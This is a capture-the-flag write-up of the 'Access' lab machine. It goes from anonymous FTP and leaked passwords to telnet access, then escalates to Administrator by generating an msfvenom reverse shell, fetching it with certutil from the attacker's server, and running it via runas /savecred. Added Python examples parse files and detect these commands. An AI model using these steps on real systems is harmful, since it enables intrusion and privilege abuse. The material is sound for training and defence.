Anonymous login to an FTP server allowed access to backup files. From the backups, a password for a protected zip could be found. The archive contained an email which held credentials to connect over telnet, giving a user-level shell.
`runas` could then be used to execute a reverse shell as the Administrator because the account had saved credentials.
As ever, let's throw Nmap at it and see what it reveals.
```
# Nmap 7.70 scan initiated Sat Sep 29 15:00:27 2018 as: nmap -sV -sS -sC -o nmap-initial.txt 10.10.10.98
Nmap scan report for 10.10.10.98
Host is up (0.074s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
|_tomcat-scan: /manager/html is HTTP 404.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 29 15:03:57 2018 -- 1 IP address (1 host up) scanned in 210.29 seconds
```
This scan reveals 3 open ports:
- 21/tcp - an FTP server - The default scripts have determined that anonymous login is allowed; this means there are likely to be files we can access.
- 23/tcp - Telnet - Telnet wants a username and password for authentication, which we don't have yet.
- 80/tcp - HTTP - At a glance there is nothing useful here.
Nmap determined that the FTP server allows anonymous logins. This means that after we connect to the server with `ftp 10.10.10.98` we can log in with the default credentials of `anonymous` and a blank password.
```
Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM       <DIR>          Backups
08-24-18  09:00PM       <DIR>          Engineer
226 Transfer complete.
```
We are greeted by two directories: the first, `Backups`, contains a file named `backup.mdb`, and the second, `Engineer`, contains a file named `Access Control.zip`. We can download them with:
```
ftp> cd Backups
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM              5652480 backup.mdb
226 Transfer complete.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 28296 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
5652480 bytes received in 3.23 secs (1.6692 MB/s)
ftp> cd ..
250 CWD command successful.
ftp> cd Engineer
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18  12:16AM                10870 Access Control.zip
226 Transfer complete.
ftp> get Access Control.zip
local: Control.zip remote: Access
200 PORT command successful.
550 The system cannot find the file specified.
ftp> get "Access Control.zip"
local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 45 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
10870 bytes received in 0.13 secs (80.7015 kB/s)
```
We now have two files from the FTP server. The first appears to be a Microsoft Access database and the second a password-protected zip. Note the "bare linefeeds received in ASCII mode" warnings above: both transfers ran in ASCII mode, which can corrupt binary files, so it is safer to issue `binary` at the `ftp>` prompt before `get` and to check the downloaded sizes match the listing.
Running `strings` on `backup.mdb` presents the ASCII text contained in the file. Running simply `strings backup.mdb` produces too much noise, so the `-n` option (minimum string length) is used to refine the search. `strings -n 10 backup.mdb` is a sufficient filter, and some potential passwords can be seen, likely to be for the zip file.
```
JMOLqQikYdb
MWQM\YbMd^di
MWQM\domMd^di
OLqQikYdbJMMQkk
`YbkbdLiQJ\Yb
`YbkbdLiQJ\dom
`Ybkbd^QJqQ
`YbkbdmdqQimY`Q
`Ybksdi\OJv
bdLiQJ\dom
domdqQimY`Q
administrator;
Administrator<
4555555555555Q
ppermission
backup_admin
access4u@security    <--- Looks Suspicious to me
```
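To make the `strings -n` step concrete, here is an added example (not part of the original writeup) that reimplements the minimum-length scan in Python and adds two things the paragraph does not show: a UTF-16LE pass, which GNU `strings` skips by default and which matters for Windows artefacts, and a heuristic that triages the output for password-like tokens. The `SAMPLE_BLOB` is constructed for the example and the secret in it (`s4mple@passw0rd`) is a made-up placeholder, not a value from the box.

```python
import re

# Constructed sample blob standing in for a binary file such as backup.mdb:
# binary noise, junk printable runs, an ASCII secret and a UTF-16LE name.
SAMPLE_BLOB = (
    b"\x00\x01\xff\xfe" + b"JMOLqQikYdb" + b"\x00\x00\x00"
    + b"backup_admin" + b"\x02\x03" + b"s4mple@passw0rd" + b"\x00\x00"
    + "Administrator".encode("utf-16le") + b"\x00\x00" + b"short" + b"\xff"
)


def extract_strings(data, min_len=10, utf16=True):
    """Emulate `strings -n min_len`: return (offset, encoding, text) tuples.
    Besides ASCII runs, optionally scan for UTF-16LE runs, which the GNU
    strings default (-e s) skips but which are common in Windows files."""
    ascii_run = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    found = [(m.start(), "ascii", m.group().decode("ascii"))
             for m in ascii_run.finditer(data)]
    if utf16:
        wide_run = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
        found += [(m.start(), "utf-16le", m.group().decode("utf-16le"))
                  for m in wide_run.finditer(data)]
    return sorted(found)


def credential_candidates(strings, min_len=8, max_len=32):
    """Heuristic triage: keep strings that mix at least three character
    classes (lower, upper, digit, symbol) and contain no whitespace.
    This is a filter for a human to review, so expect false positives."""
    out = []
    for _off, _enc, text in strings:
        if not (min_len <= len(text) <= max_len) or any(c.isspace() for c in text):
            continue
        classes = sum([any(c.islower() for c in text),
                       any(c.isupper() for c in text),
                       any(c.isdigit() for c in text),
                       any(not c.isalnum() for c in text)])
        if classes >= 3:
            out.append(text)
    return out


if __name__ == "__main__":
    for off, enc, text in extract_strings(SAMPLE_BLOB, 10):
        print(f"{off:#08x} {enc:8} {text}")
    print("candidates:", credential_candidates(extract_strings(SAMPLE_BLOB, 10)))
```

Raising `min_len` drops the short junk runs first, exactly as `-n 10` did on `backup.mdb`; the UTF-16LE pass is why a plain `strings` run can miss names stored by Windows applications.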
`access4u@security` is in fact the password for the zip. However, you'll find that it can't be extracted using `unzip`, which fails citing `unsupported compression method 99`. If you look up compression method 99 you'll find that it marks the WinZip AES encryption extension, which isn't supported by the `unzip` binary. Luckily, the system archive manager (in GNOME at least) can be used as an alternative.
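To show what "compression method 99" actually is, here is an added example (not code from the writeup) that walks a zip's central directory with the standard library, reports each entry's method, and decodes the WinZip AES extra field (id 0x9901) that method 99 entries carry: the AES key strength and the real compression method hidden behind it. The sample archive is constructed in the block with a small hand-rolled writer; the AES entry has a dummy body, since the point is the header, not the ciphertext. The `readable_by_stdlib` helper shows that Python's `zipfile`, like `unzip`, stops at the same entry.

```python
import io
import struct
import zipfile
import zlib

# Zip record signatures and the WinZip AES extra-field id.
LOCAL_SIG = 0x04034B50
CENTRAL_SIG = 0x02014B50
EOCD_SIG = 0x06054B50
AES_EXTRA_ID = 0x9901
METHOD_NAMES = {0: "stored", 8: "deflate", 12: "bzip2", 14: "lzma", 99: "WinZip AES"}
AES_STRENGTH = {1: "AES-128", 2: "AES-192", 3: "AES-256"}


def parse_extra(extra):
    """Split a zip extra field into (header id, data) records."""
    records, i = [], 0
    while i + 4 <= len(extra):
        fid, size = struct.unpack_from("<HH", extra, i)
        records.append((fid, extra[i + 4:i + 4 + size]))
        i += 4 + size
    return records


def inspect_zip(blob):
    """Walk the central directory and report method/encryption per entry."""
    eocd = blob.rfind(struct.pack("<I", EOCD_SIG))
    if eocd < 0:
        raise ValueError("no end-of-central-directory record: not a zip")
    cd_size, cd_offset = struct.unpack_from("<II", blob, eocd + 12)
    entries, pos = [], cd_offset
    while pos < cd_offset + cd_size:
        f = struct.unpack_from("<IHHHHHHIIIHHHHHII", blob, pos)
        sig, flags, method, nlen, elen, clen = f[0], f[3], f[4], f[10], f[11], f[12]
        if sig != CENTRAL_SIG:
            raise ValueError("corrupt central directory")
        name = blob[pos + 46:pos + 46 + nlen].decode("utf-8", "replace")
        extra = blob[pos + 46 + nlen:pos + 46 + nlen + elen]
        info = {"name": name, "method": method,
                "method_name": METHOD_NAMES.get(method, f"unknown ({method})"),
                "encrypted": bool(flags & 1), "aes": None, "actual_method": method}
        if method == 99:  # AES: vendor version, "AE", strength, real method
            for fid, data in parse_extra(extra):
                if fid == AES_EXTRA_ID and len(data) >= 7:
                    _ver, _vendor, strength, real = struct.unpack_from("<H2sBH", data)
                    info["aes"] = AES_STRENGTH.get(strength, f"strength {strength}")
                    info["actual_method"] = real
        entries.append(info)
        pos += 46 + nlen + elen + clen
    return entries


def build_zip(entries):
    """Hand-write a minimal zip from (name, method, body, extra) tuples; used
    only to construct the sample archive below. Bodies are stored verbatim."""
    local, central = bytearray(), bytearray()
    for name, method, body, extra in entries:
        flags = 1 if method == 99 else 0                # bit 0: entry is encrypted
        crc = 0 if method == 99 else zlib.crc32(body)   # AE-2 entries record CRC 0
        nb, off = name.encode("utf-8"), len(local)
        common = struct.pack("<HHHHIIIHH", flags, method, 0, 0, crc,
                             len(body), len(body), len(nb), len(extra))
        local += struct.pack("<IH", LOCAL_SIG, 20) + common + nb + extra + body
        central += (struct.pack("<IHH", CENTRAL_SIG, 20, 20) + common
                    + struct.pack("<HHHII", 0, 0, 0, 0, off) + nb + extra)
    eocd = struct.pack("<IHHHHIIH", EOCD_SIG, 0, 0, len(entries), len(entries),
                       len(central), len(local), 0)
    return bytes(local + central + eocd)


# Constructed sample: one plain stored entry plus one WinZip AES entry
# (method 99, AE-2, AES-256 wrapping deflate) with a dummy encrypted body.
AES_EXTRA = struct.pack("<HHH2sBH", AES_EXTRA_ID, 7, 2, b"AE", 3, 8)
SAMPLE_ZIP = build_zip([
    ("notes.txt", 0, b"hello", b""),
    ("Access Control.pst", 99, b"\x00" * 32, AES_EXTRA),
])


def readable_by_stdlib(blob, name):
    """True if Python's zipfile can extract the entry; method 99 entries cannot."""
    try:
        zipfile.ZipFile(io.BytesIO(blob)).read(name)
        return True
    except (NotImplementedError, RuntimeError, zipfile.BadZipFile):
        return False


def report(blob=SAMPLE_ZIP):
    return [(e["name"], e["method_name"], e["aes"], METHOD_NAMES.get(e["actual_method"]))
            for e in inspect_zip(blob)]


if __name__ == "__main__":
    for row in report():
        print(row)
```

Run against a real archive with `report(open(path, "rb").read())`; an entry that shows `WinZip AES` is the one `unzip` will refuse, and the decoded strength tells you what the archive manager or any other AES-capable tool will have to handle.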
Within the zip is a .pst file; using `file` to determine its type yields:
```
Access Control.pst: Microsoft Outlook email folder (>=2003)
```
When I first did this box, I'll be honest, I just found an online converter to view the file, and while it's not the best practice, in the heat of the moment while the blood was still very much up for grabs, it worked.
However, you could say the proper way of doing this is with the `readpst` tool:
```
readpst -o ./ Access\ Control.pst
Opening PST file and indexes...
Processing Folder "Deleted Items"
	"Access Control" - 2 items done, 0 items skipped.
```
The email can then clearly be seen in the `2.eml` file it creates:
```
Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.

Regards,
John
```
Either way, once the email is extracted we obtain the username `security` and the password `4Cc3ssC0ntr0ller`. This will likely be for telnet.
Connecting with `telnet 10.10.10.98`, it is seen that this is in fact the case, as these credentials are accepted. Once connected you can navigate to the `user.txt` flag and print it with `type`:
```
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: security
password:

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>cd Desktop

C:\Users\security\Desktop>type user.txt
```
For the privilege escalation, open `msfconsole` and load the exploit listener with `use exploit/multi/handler`. Next set the payload to `windows/meterpreter/reverse_tcp`, populate the options as required for your needs and start the listener with `run`:
```
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.13.37.10
lhost => 10.13.37.10
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.13.37.10      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.13.37.10:4444
```
Next we need to generate a payload; to do this we will use `msfvenom`:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.13.37.10 LPORT=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
```
Now we need to host this file so that we can access it; to do this we will use Python's `SimpleHTTPServer`:
```
python -m SimpleHTTPServer 80
```
Then, to download the shell, we can make use of `certutil` (this may not work on all versions of Windows). As we are using `certutil`, we have to host the web server on port 80 instead of the default 8000:
```
certutil.exe -urlcache -split -f http://10.10.MY.IP/shell.exe shell.exe
```
Finally we run `runas /savecred /user:ACCESS\Administrator shell.exe` to execute the shell as the Administrator. This works because the `security` account has saved credentials for the Administrator, so `runas` never prompts for a password.
```
C:\Users\security\Desktop>cd C:\temp

C:\temp>certutil.exe -urlcache -split -f http://10.10.14.1/shell.exe shell.exe
****  Online  ****
  000000  ...
  01204a
CertUtil: -URLCache command completed successfully.

C:\temp>runas /savecred /user:ACCESS\Administrator shell.exe

C:\temp>
```
If you look at the `msfconsole` you should now have a privileged shell waiting for you that can be used to read the `root.txt` flag:
```
[*] Started reverse TCP handler on 10.10.13.37:4444
[*] Sending stage (179779 bytes) to 10.10.10.98
[*] Meterpreter session 1 opened (10.10.13.37:4444 -> 10.10.10.98:49200)

meterpreter > shell
Process 3428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd c:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> type root.txt
```
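From the defender's side, both steps of the privilege escalation leave a clear trace in process-creation telemetry: `certutil -urlcache` fetching a URL and `runas /savecred`. The following is an added example (not part of the writeup) of detection logic run over constructed Windows 4688-style records in JSON-lines form; the field names (`EventID`, `SubjectUserName`, `NewProcessName`, `CommandLine`) are assumed to mirror what a SIEM ingests from the Security log, and the events themselves are made up to match the commands shown above.

```python
import json
import re

# Constructed 4688-style process-creation records, not real telemetry.
# Two mirror the writeup's commands; two are benign look-alikes.
SAMPLE_EVENTS = r"""
{"EventID": 4688, "SubjectUserName": "security", "NewProcessName": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil.exe -urlcache -split -f http://10.10.14.1/shell.exe shell.exe"}
{"EventID": 4688, "SubjectUserName": "security", "NewProcessName": "C:\\Windows\\System32\\runas.exe", "CommandLine": "runas /savecred /user:ACCESS\\Administrator shell.exe"}
{"EventID": 4688, "SubjectUserName": "security", "NewProcessName": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil.exe -hashfile C:\\temp\\report.pdf SHA256"}
{"EventID": 4688, "SubjectUserName": "security", "NewProcessName": "C:\\Windows\\System32\\runas.exe", "CommandLine": "runas /user:ACCESS\\Administrator cmd.exe"}
"""

# Each rule: (name, pattern over the command line). certutil is only flagged
# when -urlcache is paired with a URL; runas only when /savecred is present,
# since a runas that prompts for a password is ordinary admin behaviour.
RULES = [
    ("certutil_download",
     re.compile(r"\bcertutil(?:\.exe)?\b.*\s-urlcache\b.*\bhttps?://", re.I)),
    ("runas_savecred",
     re.compile(r"\brunas(?:\.exe)?\b.*\s/savecred\b", re.I)),
]


def detect(jsonl):
    """Run each rule over the CommandLine of JSON-lines events and return
    (rule name, subject user, command line) for every hit."""
    hits = []
    for line in jsonl.strip().splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        cmd = event.get("CommandLine", "")
        for rule, pattern in RULES:
            if pattern.search(cmd):
                hits.append((rule, event.get("SubjectUserName"), cmd))
    return hits


if __name__ == "__main__":
    for rule, user, cmd in detect(SAMPLE_EVENTS):
        print(f"[{rule}] user={user} cmd={cmd}")
```

Two operational notes: event 4688 only carries the command line when "Include command line in process creation events" is enabled in audit policy, so the rules above are blind without it; and the root cause on this host is the stored Administrator credential itself, which `cmdkey /list` will show and `cmdkey /delete` removes, so the fix is to purge such entries on shared or low-privilege accounts rather than only to alert on their use.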